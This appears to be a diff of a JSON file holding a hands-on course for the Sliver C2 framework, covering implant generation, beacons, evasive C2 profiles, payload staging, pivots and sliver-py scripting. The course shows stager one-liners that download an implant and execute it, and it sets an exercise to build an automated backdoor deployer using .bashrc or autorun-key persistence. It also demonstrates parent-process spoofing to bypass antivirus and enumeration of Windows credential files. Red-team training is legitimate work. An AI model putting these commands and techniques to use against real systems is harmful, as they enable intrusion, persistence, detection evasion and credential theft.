Python or Typescript to connect to the server over gRPC, which we’ll cover in the next session.\n\n## Sliver-py\n\nFor the purposes of this tutorial we’ll write our extensions using Python3, however the same result is achievable using Typescript, Golang or any other language that can handle gRPC.\n\nFirst, install the sliver-py extension using pip.\n\n```bash\npip3 install sliver-py\n```\n\nSince our extension is essentially going to be another client connection to the sliver server, you’ll also need to enable multiplayer mode and generate a new profile\n\n```bash\n[server] sliver > multiplayer\n\n[*] Multiplayer mode enabled!\n\n[server] sliver > new-operator -n tester -l 127.0.0.1\n\n[*] Generating new client certificate, please wait ...\n[*] Saved new client config to: /Users/tester/tools/tester_127.0.0.1.cfg\n```\n\nWe now have everything we need to start writing our scripts, let’s run our first example interactively in a Python shell. In this session we recommend using `ipython3` , you can install this by using pip:\n\n```html\npip3 install ipython3\n```\n\nWe first need to import a few dependencies, `SliverClientConfig` which is used to parse the client config we’ve just created and `SliverClient` which will handle the connection to the backend server.\n\n```bash\ntester@test ~/t/sliver> ipython3\nPython 3.9.16 (main, Dec 7 2022, 10:06:04)\nType 'copyright', 'credits' or 'license' for more information\nIPython 8.0.1 -- An enhanced Interactive Python. Type '?' for help.\n\nIn [1]: from sliver import SliverClientConfig, SliverClient\n\nIn [2]: DEFAULT_CONFIG = \"/Users/tester/tools/tester_127.0.0.1.cfg\"\n\nIn [3]: config = SliverClientConfig.parse_config_file(DEFAULT_CONFIG)\n\nIn [4]: client = SliverClient(config)\n\nIn [5]: await client.connect()\nOut[5]:\nMajor: 1\nMinor: 5\nPatch: 37\nCommit: \"0a43dc688ffb31a0a38511c47e8547a44a6918d4\"\nCompiledAt: 1681408237\nOS: \"darwin\"\nArch: \"arm64\"\n```\n\nFrom this point on we can use the client object to interact with the server, let’s start with listing any sessions or beacons that might be currently connected.\n\n```bash\nIn [6]: beacons = await client.beacons()\n\nIn [7]: sessions = await client.sessions()\n\nIn [8]: beacons\nOut[8]: []\n\nIn [9]: sessions\nOut[9]:\n[ID: \"f80ec897-0870-4f03-a1b1-364e5a0d243c\"\n Name: \"UNEXPECTED_PORTER\"\n Hostname: \"test.local\"\n UUID: \"c6de1a44-016a-5fbe-b76a-da56af41316d\"\n Username: \"tester\"\n UID: \"501\"\n GID: \"20\"\n OS: \"darwin\"\n Arch: \"amd64\"\n Transport: \"http(s)\"\n RemoteAddress: \"127.0.0.1:60218\"\n PID: 74773\n Filename: \"/Users/tester/tools/UNEXPECTED_PORTER\"\n LastCheckin: 1683185925\n ActiveC2: \"http://127.0.0.1\"\n ReconnectInterval: 60000000000\n PeerID: 4416183373589698218\n FirstContact: 1683185429]\n```\n\nTo run commands on this session you’ll need to create an InteractiveSession object.\n\n```bash\nIn [10]: interract = await client.interact_session(\"f80ec897-0870-4f03-a1b1-364e5a0d243c\")\n\nIn [11]: await interract.pwd()\nOut[11]: Path: \"/Users/tester\"\n```\n\nNow that we’ve got the basics of connecting to sliver and running commands down let’s write a more useful script that will display the hosts file when a new session checks in. Our goal is to first identify the Operating System, and then based on that retrieve and display the contents of the hosts file if it exists. Because this script will wait and react to events emitted by the Sliver server, we’re going to use `asyncio` to write our client.\n\n```bash\n#!/usr/bin/env python3\n\nimport os\nimport asyncio\nfrom sliver import SliverClientConfig, SliverClient\nimport gzip\n\nDEFAULT_CONFIG = \"/Users/tester/tools/neo_127.0.0.1.cfg\"\n\nasync def main():\n ''' Client connect example '''\n config = SliverClientConfig.parse_config_file(DEFAULT_CONFIG)\n client = SliverClient(config)\n await client.connect()\n\n\t\tasync for event in client.on('session-connected'):\n print('Session %s just connected !' % event.Session.ID)\n\nif __name__ == '__main__':\n loop = asyncio.get_event_loop()\n loop.run_until_complete(main())\n```\n\nAs shown above we can access the session object through `event.Session`. Let’s go ahead and add a few conditions based on the operating system.\n\n```bash\nif event.Session.OS == \"darwin\":\n print('Session is running on macOS')\n\nelif event.Session.OS == \"Linux\":\n print('Session is running on Linux')\nelif event.Session.OS == \"Windows\"\n print('Session is running on Windows')\nelse:\n print('Session is running on %s', event.Session.OS)\n```\n\nLet’s setup an InteractiveSession object like previously.\n\n```bash\ninteract = await client.interact_session(event.Session.ID)\n```\n\nWe’re going to start with writing the code for Linux and Macos, since in their case the file is located in the same place. First we check if the file exists, then we download and decompress it to display its contents using gzip.\n\n```bash\nfile_listing = await interact.ls(\"/etc/hosts\")\nif file_listing.Exists:\n\tgzipFile = await interact.download(\"/etc/hosts\")\n contents = gzip.decompress(gzipFile.Data)\n print('%r' % contents)\n```\n\nThe code for Windows is relatively similar the only major difference being the file location.\n\n```bash\nfile_listing = await interact.ls(\"C:/Windows/System32/drivers/etc/hosts\")\nif file_listing.Exists:\n\tgzipFile = await interact.download(\"C:/Windows/System32/drivers/etc/hosts\")\n contents = gzip.decompress(gzipFile.Data)\n print('%r' % contents)\n```\n\nIf we run our script and spin up a few sessions we should start to see hosts files being retrieved.\n\n```bash\npython3.11 autocat.py\nAutomatically interacting with session 16338c85-b670-44ab-ac83-2df885654b07\nb\"# Copyright (c) 1993-2009 Microsoft Corp.\\r\\n#\\r\\n# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.\\r\\n#\\r\\n# ...\n\nAutomatically interacting with session 93fcbab2-f00d-44a4-944a-e1ea8ec324e2\nb'##\\n# Host Database\\n#\\n# localhost is used to configure the loopback interface\\n# when the system is booting. Do not change this entry.\\n##\\n127.0.0.1...\n```\n\nAs an exercise, build automated backdoor deployer which first identifies the target operating system and then deploys a corresponding backdoor, in the case of Linux or Macos you can backdoor a `.bashrc` file to run a previously uploaded binary in the background, in the case of Windows you can use the registry commands to deploy a new `autorun` key.\n\nHere are a couple hints:\n\n- Start with generating sliver implants for all your target systems, on implant connection you’ll want to upload them somewhere on disc\n- In the cases of Linux and Macos you’ll want to download the `.bashrc` file, decompress and modify it locally before re-uploading it. The upload command should look like this `await interract.upload(\"/home/target/.bashrc\", contents + b'\\r\\necho \"pwned !\"')`.\n- For Windows you can look at the `registry_read` and `registry_create_key` functions.\n\n## References\n\n- [https://github.com/BishopFox/sliver/wiki/Writing-your-own-client](https://github.com/BishopFox/sliver/wiki/Writing-your-own-client)\n- [https://sliverpy.readthedocs.io/en/latest/](https://sliverpy.readthedocs.io/en/latest/)\n- [https://github.com/moloch--/sliver-py](https://github.com/moloch--/sliver-py)\n- [https://github.com/moloch--/sliver-script](https://github.com/moloch--/sliver-script)\n"},{"name":"7 - Assemblies and Bofs","content":"The Sliver armory is used to install and maintain third party extensions and aliases within sliver. The full list of available extensions can be found at https://github.com/sliverarmory/armory, keep in mind this is community maintained so not all modules are necessarily up to date. \n\nPull requests are always welcome ! \n\nYou can download all configured extensions/aliases using the armory command.\n\n```bash\n[server] sliver > armory install all\n\n? Install 18 aliases and 84 extensions? Yes\n[*] Installing alias 'SharpSecDump' (v0.0.1) ... done!\n[*] Installing alias 'SharpChrome' (v0.0.1) ... done!\n[*] Installing alias 'SharpDPAPI' (v0.0.1) ... done!\n[*] Installing alias 'SharpMapExec' (v0.0.1) ... done!\n[*] Installing alias 'KrbRelayUp' (v0.0.1) ... done!\n[*] Installing alias 'SharpRDP' (v0.0.1) ... done!\n[*] Installing alias 'SharpUp' (v0.0.1) ... done!\n[*] Installing alias 'SharpView' (v0.0.1) ... done!\n[*] Installing alias 'SharPersist' (v0.0.1) ... done!\n[*] Installing alias 'Sharp WMI' (v0.0.2) ... done!\n...\n[*] All packages installed\n```\n\nThese commands can then be used in the context of a session or beacon similarly to other commands, with a couple caveats.\n\nLet’s go ahead and run our first assembly.\n\n```bash\n[server] sliver (UNABLE_PRIDE) > seatbelt \" WindowsCredentialFiles\"\n\n[*] seatbelt output:\n\n %&&@@@&&\n &&&&&&&%%%, #&&@@@@@@%%%%%%###############%\n &%& %&%% &////(((&%%%%%#%################//((((###%%%%%%%%%%%%%%%\n%%%%%%%%%%%######%%%#%%####% &%%**# @////(((&%%%%%%######################(((((((((((((((((((\n#%#%%%%%%%#######%#%%####### %&%,,,,,,,,,,,,,,,, @////(((&%%%%%#%#####################(((((((((((((((((((\n#%#%%%%%%#####%%#%#%%####### %%%,,,,,, ,,. ,, @////(((&%%%%%%%######################(#(((#(#((((((((((\n#####%%%#################### &%%...... ... .. @////(((&%%%%%%%###############%######((#(#(####((((((((\n#######%##########%######### %%%...... ... .. @////(((&%%%%%#########################(#(#######((#####\n###%##%%#################### &%%............... @////(((&%%%%%%%%##############%#######(#########((#####\n#####%###################### %%%.. @////(((&%%%%%%%################\n &%& %%%%% Seatbelt %////(((&%%%%%%%%#############*\n &%%&&&%%%%% v1.1.1 ,(((&%%%%%%%%%%%%%%%%%,\n #%%%%##,\n\n====== WindowsCredentialFiles ======\n\n Folder : C:\\Users\\defaultuser0\\AppData\\Local\\Microsoft\\Credentials\\\n\n ...\n```\n\nAs you can see Sliver ran the Seatbelt assembly and provided us with the output of our command. Let’s investigate how exactly that happened.\n\nThe first thing we can notice is a new process spinning up when we run our command.\n\n![Untitled](https://s3-us-west-2.amazonaws.com/secure.notion-static.com/ae07f231-691e-4933-883f-fa368d0f78e6/Untitled.png)\n\nTaking a closer look, that process is a child of our implant `UNABLE_PRIDE.exe`.\n\n![Untitled](https://s3-us-west-2.amazonaws.com/secure.notion-static.com/2dfe565c-6429-4b74-a916-5a920f0ca85e/Untitled.png)\n\nIf you look at the assemblies loaded in that process, you’ll notice that the .NET clr along with the Seatbelt code are loaded into memory.\n\n![Untitled](https://s3-us-west-2.amazonaws.com/secure.notion-static.com/a92e524b-dda2-4b41-8254-3fc47e2ed025/Untitled.png)\n\nAll of this information indicates this process was used to run a post-exploitation module and will by default get caught by most AV’s. \n\nA more stealthy approach would be to change the default process to something more realistic and use parent process spoofing in order to mask our activity such as in the example below.\n\n```bash\n[server] sliver (UNABLE_PRIDE) > seatbelt -P 2968 -p \"C:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe\" \" WindowsCredentialFiles\"\n```\n\nIn this case we spoof our parent process id to `2968`, a Chrome process that has other similar child processes and set the default program to be `chrome.exe`.\n\n![Untitled](https://s3-us-west-2.amazonaws.com/secure.notion-static.com/93ee0728-be82-4fbb-8084-47f2bd336ece/Untitled.png)\n\nThis already looks a lot better and is more likely to bypass detections. A further improvement could be to identify processes that already load the .net CLR and use those to host our post-exploitation payloads or doing additional obfuscation of our extensions to avoid static detections such as `Seatbelt`,However this is somewhat beyond the scope of this course.\n\nAnother way to avoid detection is by running the assembly in process using the `-i` flag, while that avoids spinning up a new process, if the extension crashes for whatever reason you will loose your implant.\n\n```bash\n[server] sliver (UNABLE_PRIDE) > seatbelt -i \" WindowsCredentialFiles\"\n...\n```\n\nIf we take a look at the process hosting seatbelt, we’ll see its our implant process which will contain the .NET assembly references.\n\n![Untitled](https://s3-us-west-2.amazonaws.com/secure.notion-static.com/37729326-f18b-4250-a873-d4bf4e54b7d5/Untitled.png)\n\n![Untitled](https://s3-us-west-2.amazonaws.com/secure.notion-static.com/e1c05c2f-f2b7-4784-a23b-a837f456cb45/Untitled.png)\n\n## Bof’s\n\nBeacon object files are loaded using trustedsec’s coffloader, when you run a bof command the loader will first be loaded into memory and is used to run whichever bof you choose. From an operator’s perspective bof’s are similar to basic sliver commands.\n\n```bash\n[server] sliver (UNABLE_PRIDE) > sa-whoami\n\n[*] Successfully executed sa-whoami (coff-loader)\n[*] Got output:\n\nUserName\t\tSID\n====================== ====================================\ntest.local\\tester\n\nGROUP INFORMATION Type SID Attributes\n================================================= ===================== ============================================= ==================================================\ntest.local\\None Group S-1-5-21-3109228153-3872411817-1195593578-513 Mandatory group, Enabled by default, Enabled group,\nEveryone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group,\nNT AUTHORITY\\Local account and member of Administrators groupWell-known group S-1-5-114\nBUILTIN\\Administrators Alias S-1-5-32-544\nBUILTIN\\Performance Log Users Alias S-1-5-32-559 Mandatory group, Enabled by default, Enabled group,\nBUILTIN\\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group,\nNT AUTHORITY\\INTERACTIVE Well-known group S-1-5-4 Mandatory group, Enabled by default, Enabled group,\nCONSOLE LOGON Well-known group S-1-2-1 Mandatory group, Enabled by default, Enabled group,\nNT AUTHORITY\\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group,\nNT AUTHORITY\\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group,\nNT AUTHORITY\\Local account Well-known group S-1-5-113 Mandatory group, Enabled by default, Enabled group,\nLOCAL Well-known group S-1-2-0 Mandatory group, Enabled by default, Enabled group,\nNT AUTHORITY\\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group,\nMandatory Label\\Medium Mandatory Level Label S-1-16-8192 Mandatory group, Enabled by default, Enabled group,\n\nPrivilege Name Description State\n============================= ================================================= ===========================\nSeShutdownPrivilege Shut down the system Disabled\nSeChangeNotifyPrivilege Bypass traverse checking Enabled\nSeUndockPrivilege Remove computer from docking station Disabled\nSeIncreaseWorkingSetPrivilege Increase a process working set Disabled\nSeTimeZonePrivilege Change the time zone Disabled\n```\n\nSince these payloads are run in-process, they have similar advantages and drawbacks as in-process assemblies meaning no new processes are spawned on execution, but a crash risks loosing the implant.\n\nAs an exercise, take some time to try out some of the available commands like `sa-ipconfig`, `nanodump` or `sa-ldapsearch`.\n\n## References\n\nhttps://github.com/sliverarmory/armory\n\n[https://github.com/BishopFox/sliver/wiki/BOF-&-COFF-Support](https://github.com/BishopFox/sliver/wiki/BOF-&-COFF-Support)\n\n[https://github.com/BishopFox/sliver/wiki/Aliases-&-Extensions](https://github.com/BishopFox/sliver/wiki/Aliases-&-Extensions)\n\n[https://github.com/sliverarmory/COFFLoader](https://github.com/sliverarmory/COFFLoader)\n\n"}]} \ No newline at end of file +{"tutorials":[{"name":"1 - Getting Started","content":"# This course is intented for the 1.6 version of Sliver, which is not yet published\n\n`sliver-server` is the binary you want to use to run the Sliver C2 server, `sliver-client` is solely a client to connect to a Sliver C2 server. Sliver server also acts as a client on its own, so you don’t necessarily run sliver server and client separately.\n\nFirst time running Sliver will take a couple seconds as its retrieving its dependencies, consecutive executions will be much faster. Go ahead and launch the `sliver-server`.\n\n```asciinema\n{\"src\": \"/asciinema/startup.cast\", \"cols\": \"132\", \"rows\": \"28\", \"idleTimeLimit\": 8}\n```\n\nLet's take a couple minutes to discuss what Sliver actually is and how its setup.\n\n![Alt text](/images/Architecture.png)\n\nNow that Sliver is running, lets generate and execute your first implant to try out some of the basic features of Sliver, for now we’re going to run everything on the local host.\n\nHere's what we're going to do: \n* Generate your implant using the `generate` command as shown below.\n* Start HTTP listener on port 80\n* Execute implant in a separate terminal\n\n```asciinema\n{\"src\": \"/asciinema/first-implant.cast\", \"cols\": \"132\", \"rows\": \"14\", \"idleTimeLimit\": 8}\n```\n\nNow let’s select our implant and run our first command using the `use` command.\n\n```bash\n[server] sliver > use\n? Select a session or beacon: \nSESSION 1884a365 RELATED_EARDRUM [::1]:49153 test.local tester darwin/amd64\n[*] Active session RELATED_EARDRUM (1884a365-085f-4506-b28e-80c481730fd0)\n\n[server] sliver (RELATED_EARDRUM) > pwd\n\n[*] /Users/tester/tools\n```\n\nOnce you have reached this point, go ahead and explore some of the commands listed below. In each case first checkout the commands help using the **`-h`** flag then try it out!\n\n```bash\nExploring and interacting with the filesystem\n\nFilesystem\n cat Dump file to stdout\n cd Change directory\n cp Copy a file\n download Download a file\n grep Search for strings that match a regex within a file or directory\n head Grab the first number of bytes or lines from a file\n ls List current directory\n memfiles List current memfiles\n mkdir Make a directory\n mount Get information on mounted filesystems\n mv Move or rename a file\n pwd Print working directory\n rm Remove a file or directory\n tail Grab the last number of bytes or lines from a file\n upload Upload a file\n```\n\n```asciinema\n{\"src\": \"/asciinema/filesystem.cast\", \"cols\": \"132\", \"rows\": \"14\", \"idleTimeLimit\": 8}\n```\n\nGetting some environmental information\n```bash\nInfo\n env List environment variables\n getgid Get session process GID\n getpid Get session pid\n getuid Get session process UID\n info Get session info\n ping Send round trip message to implant (does not use ICMP)\n screenshot Take a screenshot\n whoami Get session user execution context\n```\nExecute a binary\n\n```asciinema\n{\"src\": \"/asciinema/execute.cast\", \"cols\": \"132\", \"rows\": \"14\", \"idleTimeLimit\": 8}\n```\n\nRunning an interactive shell\n\n```asciinema\n{\"src\": \"/asciinema/shell.cast\", \"cols\": \"132\", \"rows\": \"14\", \"idleTimeLimit\": 8}\n```\n"},{"name":"2 - Beacons vs Sessions","content":"Sliver implants support two types of connections, sessions and beacons.\n\nSessions use long-poling connections, which means they use a single TCP connection which is constantly open. Beacons on the other hand call back periodically, and will sleep when not active which can help keep their presence hidden.\n\nTypically during an engagement you will want to deploy a beacon on the target system, and switch to a session while doing more active enumeration activities.\n\nLet’s start with generating and deploying a beacon using `http`.\n\n```asciinema\n{\"src\": \"/asciinema/beacon_generation.cast\", \"cols\": \"132\", \"rows\": \"14\", \"idleTimeLimit\": 8}\n```\n\nYou can see the beacon callback times either in the `info` command or using `beacons watch`.\n\n```bash\n[server] sliver > beacons watch\n\n ID Name Transport Username Operating System Last Check-In Next Check-In\n========== =============== =========== ================= ================== =============== ===============\n 942c647c TIRED_GIRAFFE http(s) tester darwin/amd64 52s 12s\n\n```\n\nBeacon callback times and jitter can be set either during generation or on the fly using the `reconfig` command.\n\nThe example below sets the callback time to 5s with a 1s jitter.\n\n```bash\n[server] sliver (TIRED_GIRAFFE) > reconfig -i 5s -j 1s\n\n[*] Tasked beacon TIRED_GIRAFFE (b8aa6fd8)\n\n[+] TIRED_GIRAFFE completed task b8aa6fd8\n\n[*] Reconfigured beacon\n\n[server] sliver (TIRED_GIRAFFE) > info\n\n Beacon ID: 942c647c-8409-4877-9fa2-b84a7f27ad45\n Name: TIRED_GIRAFFE\n Hostname: tester.local\n UUID: c6de1a44-016a-5fbe-b76a-da56af41316d\n Username: tester\n UID: 501\n GID: 20\n PID: 55879\n OS: darwin\n Version:\n Locale:\n Arch: amd64\n Active C2: https://127.0.0.1\n Remote Address: 127.0.0.1:51803\n Proxy URL:\n Interval: 1m0s\n Jitter: 30s\n First Contact: Wed Apr 19 01:14:21 CEST 2023 (10m30s ago)\n Last Checkin: Wed Apr 19 01:18:20 CEST 2023 (6m31s ago)\n Next Checkin: Wed Apr 19 01:19:46 CEST 2023 (5m5s ago)\n```\n\nCommands issued for beacons can be viewed using `tasks`, the task state will indicate wether the command has completed or not. The results of previously run tasks can be viewed using `tasks fetch`.\n\n```asciinema\n{\"src\": \"/asciinema/beacon_tasks.cast\", \"cols\": \"132\", \"rows\": \"14\", \"idleTimeLimit\": 8}\n```\n\nSession can be spun up using the `interractive` command.\n\n```asciinema\n{\"src\": \"/asciinema/beacon_interractive.cast\", \"cols\": \"132\", \"rows\": \"14\", \"idleTimeLimit\": 8}\n```\n\nBecause of the differences between sessions and beacons, certain commands like `upload` or `download` are slower on beacons due to the callback time. Others such as socks5 are not supported and only allowed for sessions. As a rule of thumb anything requiring higher network bandwith should be run from a session.\n\nLet’s switch to our newly created session and spin-up a `socks5` proxy.\n\n```bash\n\nsocks\n[server] sliver (TIRED_GIRAFFE) > use\n\n? Select a session or beacon: SESSION 131a60b9 TIRED_GIRAFFE 127.0.0.1:51969 tester.local tester darwin/amd64\n[*] Active session TIRED_GIRAFFE (131a60b9-db4f-4913-9064-18a17a0f09ab)\n\n[server] sliver (TIRED_GIRAFFE) > socks5 start\n\n[*] Started SOCKS5 127.0.0.1 1081\n⚠️ In-band SOCKS proxies can be a little unstable depending on protocol\n```\n\nYou can then point your browser to port 1081 to tunnel traffic through the implant to your target’s local network.\n\nTry out some of the previous commands and compare behaviour on beacons and sessions. Once you are done, you should remember to close your session using the `close` command.\n"},{"name":"3 - C2 Profiles and configuration","content":"When generating implants sliver uses a C2Profile configuration, which will be use to generate the effective network configuration of the implant. For example if configured to use /admin and /demo as callback urls, it might use one, the other or both allowing two implants using the same configuration to still seem slightly different from a network traffic perspective.\n\nC2 profile configurations can be seen using the `c2profile` command, which also allows import and export features.\n\nThe full list of possible configuration option can be found in the references section below, but for now lets instead customise the existing configuration.\n\nLets imagine we’re trying to breach a customer we've noticed uses ruby-on-rails for their applications. By default sliver will use the following extensions:\n\n- `.woff` for staging\n- `.js` for poll requests\n- `.html` for key exchanges\n- `.png` for close session\n- `.php` for session messages\n\nWe will need to update the session messages and staging with something more realistic and place all references to `woff` or `php` with something less suspicious like `css`, `rb` or `erb`.\n\nWe will also use a list of common Urls and filenames for Ruby on Rails like `https://github.com/danielmiessler/SecLists/blob/master/DiscoveryWeb-Content/ror.txt` for the `*_files` and `*_paths` variables. You could also reuse Urls discovered while enumerating your target's external perimeter in a similar way.\n\nWe will split the urls using a script like the example below, and then update the files and paths variables in our configuration file.\n\n```python\nimport json\nimport math\nimport sys\nimport random\n\n\ndef updateProfile(c2ProfileName, urls, cookieName):\n data = open(urls).readlines()\n c2Profile = open(c2ProfileName, \"r\").read()\n jsonC2Profile = json.loads(c2Profile)\n\n paths, filenames, extensions = [], [], []\n for line in data:\n line = line.strip()\n if \".\" in line:\n extensions.append(line.split(\".\")[-1])\n\n if \"/\" in line:\n segments = line.split(\"/\")\n paths.extend(segments[:-1])\n filenames.append(segments[-1].split(\".\")[0])\n\n extensions = list(set(extensions))\n if \"\" in extensions:\n extensions.remove(\"\")\n random.shuffle(extensions)\n\n filenames = list(set(filenames))\n if \"\" in filenames:\n filenames.remove(\"\")\n\n paths = list(set(paths))\n if \"\" in paths:\n paths.remove(\"\")\n\n if len(extensions) < 5:\n print(f'Got {len(extensions)} extensions, need at least 5.')\n exit(0)\n\n if len(paths) < 5:\n print(f'Got {len(paths)} paths need at least 5.')\n exit(0)\n\n if len(filenames) < 5:\n print(f'Got {len(filenames)} paths need at least 5.')\n exit(0)\n\n exts = ['poll_file_ext','stager_file_ext', 'start_session_file_ext', 'session_file_ext', 'close_file_ext' ]\n for ext in exts:\n jsonC2Profile[\"implant_config\"][ext] = extensions[0]\n extensions.pop(0)\n\n pathTypes = ['poll_paths','stager_paths', 'session_paths', 'close_paths' ]\n for x, pathType in enumerate(pathTypes):\n jsonC2Profile[\"implant_config\"][pathType] = paths[math.floor(x*(len(paths)/len(pathTypes))):math.floor((x+1)*(len(paths)/len(pathTypes)))]\n\n fileTypes = ['poll_files','stager_files', 'session_files', 'close_files']\n for x, fileType in enumerate(fileTypes):\n jsonC2Profile[\"implant_config\"][fileType] = filenames[math.floor(x*(len(filenames)/len(fileTypes))):math.floor((x+1)*(len(filenames)/len(fileTypes)))]\n\n jsonC2Profile[\"server_config\"][\"cookies\"] = [cookieName]\n c2Profile = open(c2ProfileName, \"w\")\n c2Profile.write(json.dumps(jsonC2Profile))\n print(\"C2 Profile updated !\")\n\n\nif __name__ == \"__main__\":\n if len(sys.argv) < 4:\n print(\"Usage: updateProfile.py myC2Profile myurls.txt cookieName\")\n exit(0)\n\n updateProfile(sys.argv[1], sys.argv[2], sys.argv[3])\n```\nThe example below demonstrates how to change and import a profile.\n\n```asciinema\n{\"src\": \"/asciinema/custom_c2profile.cast\", \"cols\": \"132\", \"rows\": \"14\", \"idleTimeLimit\": 8}\n```\n\nAt this point we can generate a new implant using our new profile.\n\n```asciinema\n{\"src\": \"/asciinema/implant_custom_c2profile.cast\", \"cols\": \"132\", \"rows\": \"14\", \"idleTimeLimit\": 8}\n```\n\nIf we review the debug logs of our implant we can see that the connections now use our new profile.\n\n```asciinema\n{\"src\": \"/asciinema/implant_debug_logs.cast\", \"cols\": \"132\", \"rows\": \"28\", \"idleTimeLimit\": 8}\n```\n\nIdeally during engagements your recon phase should inform your C2 infrastructure, reusing similar hosting providers, technologies and communication protocols can help your implant fly under the radar. \n\n"},{"name":"4 - HTTP Payload staging","content":"When using Sliver during a live engagement, you’re going to need to use custom stagers, which are essentially a first binary or commandline that will retrieve and/or load Sliver into memory on your target system. Sliver can generate shellcode for your stager to execute by using the `profiles` command.\n\nFor this exercise we will create a new beacon profile and prepare to stage it.\n\n```asciinema\n{\"src\": \"/asciinema/create_profile.cast\", \"cols\": \"132\", \"rows\": \"14\", \"idleTimeLimit\": 8}\n```\n\nIf you look at the generated implant, you'll notice the `ID` field has been populated. When downloading your payload from the staging server your URL needs to be in the form of:\n```\nhttps://sliver-ip/whatever.stager_file_ext?x=yourID\n```\n\nThere is a lot of flexibility in the form of this URL, the conditions for successfull staging are:\n* The file extension needs to match the c2 profile's stager_file_ext\n* There has to be a one character http url parameter\n* The digits found in the ID need to match an implant ID, if your implant ID is 1234, abcd1234, 12beu34 are all valid values\n\nTo expose a payload you need to use the `implants stage` command and specifically select the implant to leave accessible.\n\n```asciinema\n{\"src\": \"/asciinema/stage_implant.cast\", \"cols\": \"132\", \"rows\": \"14\", \"idleTimeLimit\": 8}\n```\n\nAt this point we can try retrieving our implant, the ID is 19778.\n\n```asciinema\n{\"src\": \"/asciinema/implant_curl.cast\", \"cols\": \"132\", \"rows\": \"14\", \"idleTimeLimit\": 8}\n```\n\nSliver staging also supports encoding or encrypting our payloads before exposing them extenrally using the `profile stage` command, the implant configuration remains the same but you are now able to stage different versions of it simultaneously.\n\n```asciinema\n{\"src\": \"/asciinema/stage_compress_encrypt.cast\", \"cols\": \"132\", \"rows\": \"14\", \"idleTimeLimit\": 8}\n```\n\nA simple stager could look like this for example in Linux:\n\n```\ncurl http://localhost/nothingtoseehere.yml?c=1234 --output nothingtoseehere && chmod u+x nothingtoseehere &&nohup ./nothingtoseehere\n```\n\nOr on Windows:\n```\ncurl http://172.20.10.3/test.woff?a=29178 -o t.exe && .\\t.exe\n```\n"},{"name":"5 - Pivots","content":"Pivots allow routing implant traffic through other implants. This can be usefull in environments that don’t have any outbound access, but are reachable from other parts of the network that you have access to.\n\nSliver supports two types of pivots, tcp which can be used on all operating systems and named pipes which are windows only.\n\nIn both cases the workflow is relatively similar, as a first step select a session and setup a pivot listener.\n\n```bash\n[server] sliver (INNER_GO-KART) > pivots tcp\n\n[*] Started tcp pivot listener :9898 with id 1\n\n[server] sliver (INNER_GO-KART) > pivots\n\n ID Protocol Bind Address Number Of Pivots\n==== ========== ============== ==================\n 1 TCP :9898 0\n```\n\nThe listening port and interface can be configured during creation.\n\nThe next step is to generate a payload that will connect to our listener.\n\n```bash\n[server] sliver (INNER_GO-KART) > generate --tcp-pivot 127.0.0.1 --os macos\n\n[*] Generating new darwin/amd64 implant binary\n[*] Symbol obfuscation is enabled\n[*] Build completed in 12s\n[*] Implant saved to /Users/tester/tools/VALUABLE_SICK\n```\n\nExecuting this payload will cause it to connect back through our original implant and then back to our C2 server.\n"},{"name":"6 - Scripting","content":"Reactions are a basic way to automate tasks in the sliver console, they allow you to specify sliver commands to run on a list of events.\n\n```bash\nReactable Events:\n session-connected Triggered when a new session is opened to a target\n session-updated Triggered on changes to session metadata\nsession-disconnected Triggered when a session is closed (for any reason)\n canary Triggered when a canary is burned or created\n watchtower Triggered when implants are discovered on threat intel platforms\n loot-added Triggered when a new piece of loot is added to the server\n loot-removed Triggered when a piece of loot is removed from the server\n```\n\nLet’s go ahead and create a reaction to list the current directory and environment variables when a new session checks in.\n\n```bash\nreaction set -e \"session-connected\"\n\n[*] Setting reaction to: Session Opened\n\n? Enter commands: [Enter 2 empty lines to finish]pwd\nenv\n? Enter commands:\npwd\nenv\n\n[*] Set reaction to session-connected (id: 1)\n```\n\nThe reaction is now set, if you spin up a new session these commands will be automatically run on that session’s initial connection.\n\n```bash\n[*] Session 99c7a639 UNEXPECTED_PORTER - 127.0.0.1:59966 (test.local) - darwin/amd64 - Thu, 04 May 2023 09:04:58 CEST\n\n[*] Execute reaction: 'pwd'\n\n[*] /Users/tester\n\n[*] Execute reaction: 'env'\n\nPWD=/Users/tester\nCOLORTERM=truecolor\n...\n```\n\nYou can remove reactions using `reaction unset`.\n\nHowever, there are a couple of limitations to keep in mind when using reactions, first off these are run in the console you are currently using, which is not necessarily the server console. So if you are connected to a sliver server using the sliver client, if you disconnect the client the reactions are no longer running. \n\nSecondly reactions are a relatively basic mechanism, you can’t use any conditional statements or more complex background tasks with them. For more complex use-cases you can instead write your own client in Python or Typescript for example to connect to the server over gRPC, which we’ll cover next.\n\n## Sliver-py\n\nFor the purposes of this tutorial we’ll write our extensions using Python3, however the same result is achievable using Typescript, Golang or any other language that can handle gRPC.\n\nFirst, install the sliver-py extension using pip.\n\n```bash\npip3 install sliver-py\n```\n\nSince our extension is essentially going to be another client connection to the sliver server, you’ll also need to enable multiplayer mode and generate a new profile\n\n```bash\n[server] sliver > multiplayer\n\n[*] Multiplayer mode enabled!\n\n[server] sliver > new-operator -n tester -l 127.0.0.1\n\n[*] Generating new client certificate, please wait ...\n[*] Saved new client config to: /Users/tester/tools/tester_127.0.0.1.cfg\n```\n\nWe now have everything we need to start writing our scripts, let’s run our first example interactively in a Python shell. \nWe first need to import a few dependencies, `SliverClientConfig` which is used to parse the client config we’ve just created and `SliverClient` which will handle the connection to the backend server.\n\n```bash\nPython 3.9.16 (main, Dec 7 2022, 10:06:04)\nType 'copyright', 'credits' or 'license' for more information\nIPython 8.0.1 -- An enhanced Interactive Python. Type '?' for help.\n\nIn [1]: from sliver import SliverClientConfig, SliverClient\n\nIn [2]: DEFAULT_CONFIG = \"/Users/tester/tools/tester_127.0.0.1.cfg\"\n\nIn [3]: config = SliverClientConfig.parse_config_file(DEFAULT_CONFIG)\n\nIn [4]: client = SliverClient(config)\n\nIn [5]: await client.connect()\nOut[5]:\nMajor: 1\nMinor: 5\nPatch: 37\nCommit: \"0a43dc688ffb31a0a38511c47e8547a44a6918d4\"\nCompiledAt: 1681408237\nOS: \"darwin\"\nArch: \"arm64\"\n```\n\nFrom this point on we can use the client object to interact with the server, let’s start with listing any sessions or beacons that might be currently 